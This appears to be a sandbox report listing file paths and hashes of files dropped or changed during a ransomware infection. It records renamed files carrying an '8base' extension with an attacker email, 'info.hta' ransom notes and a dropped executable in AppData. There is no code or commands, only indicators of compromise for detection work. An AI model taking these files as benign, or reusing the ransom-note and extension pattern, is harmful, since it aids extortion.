C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll

MD5 d765b98325d89c076feeab1282cd08ea
SHA1 1c0e044db845f4bf5486ccf23675b5394d568bb3
SHA256 ac2f0a68a2bcaaf2decb0aaf1b50d652ed8b631b08d06b910b407fef9069412e
SHA512 5c726e7ca5282d1f51178c814c76ca268b604ccb5aad744aadfdded4883f9e28afd0d9f9a30daca2fed017028c54e54f6e04f3aabb12a2d0b37a44267fadb37d

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\Manifests\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332.manifest

MD5 d69a1676090849faa06b2bf4cbe631df
SHA1 5206fb038c2f8d69ea8f6c09ae64de3413d3cc33
SHA256 27584ac3596b10d23744c95eada3002419cb1551c7f959a24143b71fd11d285b
SHA512 9eee0eccaaf3203b8f106d4eaf3bf0914bbec7d6cb76442fc1bd59f1b3552ea2a104bc0bc8280c2de4c81472f5806ae5c1f1158fd093c61179e103170d6eebfb

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.1_none_8eded76dfc707d27\WalletService.dll

MD5 4925079bb1e3bc51bd8745ef5aa6325e
SHA1 c6b6a57df4645f4f1efae6ed539aa618851d76df
SHA256 061fd9560a1cd66cf4b9f871c2f93af2c44720ae8134f325c1d12841489267cb
SHA512 4efa6227d46bc97e59f31f4949ebe5951958b6dac86c5208d8f9221ce9d732ffea225383a1b8ee23455455f68c3dba6ff6b3eee8bd23d4fc43f6891970220de7

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\r\Windows.ApplicationModel.Wallet.dll

MD5 c9d97269a33c6769582c81d880f78a1c
SHA1 e3c04dad51e127ada2f833a2220594d2b34c572c
SHA256 e8c29c666618ef4c7f2406883e0aa06597cc794b304073b555e1520016fac8e6
SHA512 b6de144cb010fc3a400b04c5a976a97be3d6c1d99ff24c30bdc0e00ee8f77d8c5d6dbc0449651df3a3342c79566fe1bab26a67968b90f3ead7323947145ab1ed

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\System32\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\System32\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml

MD5 108f130067a9df1719c590316a5245f7
SHA1 79bb9a86e7a50c85214cd7e21719f0cb4155f58a
SHA256 c91debd34057ca5c280ca15ac542733930e1c94c7d887448eac6e3385b5a0874
SHA512 d43b3861d5153c7ca54edd078c900d31599fc9f04d6883a449d62c7e86a105a3c5dfb2d232255c41505b210b063caf6325921dc074fcdf93407c9e2c985a5301

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe

MD5 cfe72ed40a076ae4f4157940ce0c5d44
SHA1 8010f7c746a7ba4864785f798f46ec05caae7ece
SHA256 6868894ab04d08956388a94a81016f03d5b7a7b1646c8a6235057a7e1e45de32
SHA512 f002afa2131d250dd6148d8372ce45f84283b8e1209e91720cee7aff497503d0e566bae3a83cd326701458230ae5c0e200eec617889393dd46ac00ff357ff1b0

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll

MD5 b09d3cc034d47d9e871b389f61f4a770
SHA1 752a0e72498667fb9bcea8c50e553eec26ada599
SHA256 cee6da30438bc7547140aad7f84f00fcec8b959afbdeb0d5551eea74863a100b
SHA512 c6acc7bc22e7bce90d6a489f930b31e561664bd1cb6279a4e4640e9fe9bbe965481d7b7453e69664b9b61b44e4755b5cfa36df3d5d971377ec1ade12cc7991c9

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll

MD5 0ec2f54af7a73c0281e0b7ba5a40abcb
SHA1 6d1b10fa5b1563307278b974de0a131452dd6641
SHA256 f80fcc0e391b6a9a881e1d44e7a4b521cb54134e32dde6e5b57d68da7c75a1e8
SHA512 8d43caa8023d35aafd87ebd76970fb54411d2e7709d7c89ce0831d6d1931ef22138601af94de27dec53cb326411a47da588479843ca07cf920d8177b5fa233fd

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui

MD5 bc5d54311d229eaceb98977248a3e44c
SHA1 0011ae8085b6409a944a9e431652d9cafbcfce48
SHA256 32737c8e34b90b7f0d57b607b07b641f7b8a80ae4797856c6cb8ccbf8c1414fe
SHA512 09bff5f078a0834e8ac11a02fc57763aac1224e06d0ecf7940af38d2bc5e41b38ff5d508bd1c8a73b46c68a3c01916d1ed2e18925e0b1d2fe6d10d422ad7b4b8

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll

MD5 b7d6a6bb752e0f3b336fe9f48f2bd17f
SHA1 b2c212468d9e4988a13ebf5b8397fc864e958d4a
SHA256 6aafa6d7ee7b50f43a1a74f518132ad1f9e0ca2c7c1c83cb0508e716a7eef276
SHA512 0210af854ea1504d1d15b17979e3fb3140c3ddf037dbb828c42e4b656f93696744aa1f88c2e94e67781eaa16d923b69fb016d30e99879cca41f69fe9e3b1004d

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\r\WalletService.dll

MD5 516049b4656f0540b3900a19c43eb0e7
SHA1 6fd0260fe345c763e042842d204c8cddb4d9e1d9
SHA256 d53a4afc80b79999013bfd983bdb0a5ddded457397debf149002335c2fceadaf
SHA512 2dca05b264bffcc62e3b92b5e61aa037ef858f6f625e5c0e946a82f1edf7586c17244001093567ff534c4c31e41dc6446fbb23e5f1c6b6a5fe798f2dd6d939ef

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\System32\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Local\Temp\F67A\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml

MD5 108f130067a9df1719c590316a5245f7
SHA1 79bb9a86e7a50c85214cd7e21719f0cb4155f58a
SHA256 c91debd34057ca5c280ca15ac542733930e1c94c7d887448eac6e3385b5a0874
SHA512 d43b3861d5153c7ca54edd078c900d31599fc9f04d6883a449d62c7e86a105a3c5dfb2d232255c41505b210b063caf6325921dc074fcdf93407c9e2c985a5301

C:\Users\Admin\AppData\Local\Temp\F67A\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml

MD5 94f90fcd2b8f7f1df69224f845d9e9b7
SHA1 a09e3072cc581cf89adaf1aa20aa89b3af7bf987
SHA256 a16113a66b1c36f919b5f7eaa3fb7aa8e0ba9e057823861aabea703cc06a04c0
SHA512 51f4ee06a8d8bf1121083bf4383433160f16c68d1fe4c44e5d0e0529910d27ba8446c7a4bef359b990574d1d61563da30139c6d09ad0ad1a5b5c7748b8da08f3

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml

MD5 94f90fcd2b8f7f1df69224f845d9e9b7
SHA1 a09e3072cc581cf89adaf1aa20aa89b3af7bf987
SHA256 a16113a66b1c36f919b5f7eaa3fb7aa8e0ba9e057823861aabea703cc06a04c0
SHA512 51f4ee06a8d8bf1121083bf4383433160f16c68d1fe4c44e5d0e0529910d27ba8446c7a4bef359b990574d1d61563da30139c6d09ad0ad1a5b5c7748b8da08f3

C:\Users\Admin\AppData\Roaming\Rhyivhytef.exe

MD5 ba671a266b0fb8320d3127f1f797da8c
SHA1 494d3fdac306a9bb59b099cc8a10b8e382c7fd2d
SHA256 6fd1e716c8032d59d693b1468f4452cffd56f6f2dea391444d3c3cc0092b4bec
SHA512 2b4eadf6dc8bffde13e761e6d2c47f406c8c2e9ae4e987bee0efefca64f7cadd266238fe71a62620235c426618be10e2a541641565a2cd07723b88a18c447bf9

C:\Users\Admin\AppData\Roaming\tertdag

MD5 14d53b6bca02208a2c5b0080a3344175
SHA1 e079d5eab6645dcbf35d7eec5b593a16bbfb7b4e
SHA256 56dd792dd5fef77693fda971d8b33f014e28a47bce927b5714a9a1303e4cbbac
SHA512 70370ea4339a85f5dd91d889e676d254f21e3118c07a42fd78c3aa4fb7673ef42a2cd487666f5391041b57f00de44bfea59127ba964698a92155a67985633055

C:\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\Users\Admin\Desktop\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\users\public\desktop\info.hta

MD5 0d971447375d95699a5e0e08b4e06e99
SHA1 c9267226e75afc88b515b1d7eddb6e2482ba5acf
SHA256 ce9f46b5cf76d34af82e51ec9c7ad558c09e20b2fb1b26d4ece8c040b549ee84
SHA512 9bb7d539b343234bbdcabde47fab5831c6ce5b1484180d7759ae8995bc63271bea4cbdd68ca64a9a40686a9961bfb56f3a02dc0b5fe176b51befbd693d130f56

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll.id[18CA63B3-3483].[[email protected]].8base

MD5 b09d3cc034d47d9e871b389f61f4a770
SHA1 752a0e72498667fb9bcea8c50e553eec26ada599
SHA256 cee6da30438bc7547140aad7f84f00fcec8b959afbdeb0d5551eea74863a100b
SHA512 c6acc7bc22e7bce90d6a489f930b31e561664bd1cb6279a4e4640e9fe9bbe965481d7b7453e69664b9b61b44e4755b5cfa36df3d5d971377ec1ade12cc7991c9

C:\Users\Admin\AppData\Local\Temp\F67A\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe.id[18CA63B3-3483].[[email protected]].8base

MD5 eed39da9e5b01b5f198190fc3775fd18
SHA1 7ea3977b931e84bc0da264154ae058b2a4ef0e23
SHA256 b467bae7961ef4f24d825136aa31449d4d349fc470dab83385d83c6bf0fa5304
SHA512 17162a257765e8a7136f7012307bd312eb5f4f8555c626857f555e3b8f28aef27fcddfc0dff0d3126a95787751ee52bcdddbb014df0a749aca0ea78c7469c85d

C:\Users\Admin\AppData\Local\Temp\F67A\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 b8e7366ec9ebdabff87b5f9c4d9ac1c0
SHA1 5b909af102e06b197504edc82f274029165dba6c
SHA256 a08c0d3afa68fabf6ca9ede20da0f7d2f8c406f11f195f78ef279782136c6d51
SHA512 7aeee6eae6a5a456c3aca5ea73d54cf87464f7e5e580f6afe069076a30a4db4645928c4c14e6d5d4f97838a59fb7ea0b36dd4488a4bfb30e42f5951dde8a5c72

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 66f8876b1cc10e3bf17a2e97b614a716
SHA1 e8ccbc0a625a6b7fd2b4e9f15122a74f7b5aefe6
SHA256 79f73c2f69c0421651a8e34609ab5aa961782d0bd628ab4e2cb7d7d797f1fa65
SHA512 95dfa474f5d72b2fa502d05590f3613d7d4b728107268ba0b450aa0979f076b2769a40e41152d967c671b7077433fb4d8abbc90509d49e7419017e08341a8382

C:\Users\Admin\AppData\Local\Temp\F67A\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml.id[18CA63B3-3483].[[email protected]].8base

MD5 27d04ab21b5a61609d51cffa378b0c0a
SHA1 7eb94404f90e49d44acdb416af5aa9fd5a50d1c3
SHA256 c04f462d22700bc7fd70fa3b6edd43b9362b110c900d63c8377639b947675113
SHA512 3d1e25ef4c0755a60f239ee49156da1932eb820ba2d97ee8529f90f9620a7e1de00e1475e726ac797eb0b1c64b80b06955edb85a35cfc196c4a469a2b0f8c8f5

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\F67A\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Roaming\Rhyivhytef.exe

MD5 e7ac55d61ab9cfcf180c92c1381a2fa1
SHA1 f79fe555c492a9effe26ead87ec7eb3c53899083
SHA256 afddec37cdc1d196a1136e2252e925c0dcfe587963069d78775e0f174ae9cfe3
SHA512 e3fa85d3af3625384ecea090a7c205325825a1b91ad43e1f86f56a719ad733d71b4be9c34edd03d8ff774e28b3feb605dc073f66f4a01359f8e4bad5b8bcfae2